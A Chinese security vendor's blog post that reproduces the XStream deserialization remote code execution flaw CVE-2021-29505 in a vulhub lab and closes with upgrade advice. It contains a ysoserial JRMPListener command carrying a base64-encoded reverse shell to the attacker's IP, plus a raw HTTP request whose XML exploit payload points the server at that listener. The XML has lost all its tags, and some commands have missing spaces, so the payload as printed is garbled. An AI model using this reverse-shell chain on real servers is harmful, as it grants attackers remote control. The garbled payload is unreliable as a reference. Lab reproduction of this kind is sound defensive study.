提交需求
*
*

*
*
*
立即提交
点击”立即提交”,表明我理解并同意 《美创科技隐私条款》

logo

    产品与服务
    解决方案
    技术支持
    合作发展
    关于美创

    申请试用
      Xstream远程代码执行漏洞复现
      发布时间:2021-06-18 阅读次数: 240 次

      XStream是一个常用的Java对象和XML相互转换的工具,攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成反序列化代码执行漏洞。该漏洞允许远程攻击者直接获取服务器权限。


      漏洞编号

      CVE-2021-29505


      影响范围


      xStream <= 1.4.16


      环境搭建


      1. 使用vulhub进行漏洞环境搭建


      https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml


      2.执行如下命令启动镜像环境


      docker-compose up -d


      图片


      3. 访问地址:http://192.168.166.133:8080/


      图片

      漏洞复现


      攻击机ip:192.168.166.131

      靶机ip:192.168.166.133


      1.在攻击机上使用ysoserial的JRMPListener启动一个恶意的RMI Registry(工具下载地址:https://github.com/frohoff/ysoserial)。其中的bash命令需要进行bash64编码。


      图片


      2.Bash64编码后的反弹shell命令如下


      java -cp ysoserial-master.jarysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjYuMTMxLzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"


      3.执行过程如下


      图片


      4.执行如下数据包


      POST / HTTP/1.1

      Host:192.168.166.133:8080

      User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101Firefox/88.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

      Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

      Connection:keep-alive

      Upgrade-Insecure-Requests:1

      Content-Type:application/xml

      Content-Length:3119


         

         

             

                 2

             

             3

             

                 12345

                 

                     com.sun.xml.internal.ws.api.message.Packet@2002fc1dContent

                 

             

             

                 12345

                 

                     

                        true

                        SOAP_11

                         

                         

                            false

                             

                                 

                                     

                                       

                                            aa

                                            aa

                                       

                                         

                                           

                                           

                                               

                                                     UnicastRef

                                                    192.168.166.131

                                                    1099

                                                     0

                                                    0

                                                    0

                                                    0

                                                    false

                                               

                                           

                                            192.168.166.131

                                             1099

                                       

                                   

                                 

                             

                         

                     

                 

           

         


      图片


      5. 获取反弹shell


      图片


      修复建议


      升级XStream到1.4.17版本及以上版本。

      免费试用
      服务热线

      马上咨询

      400-811-3777

      回到顶部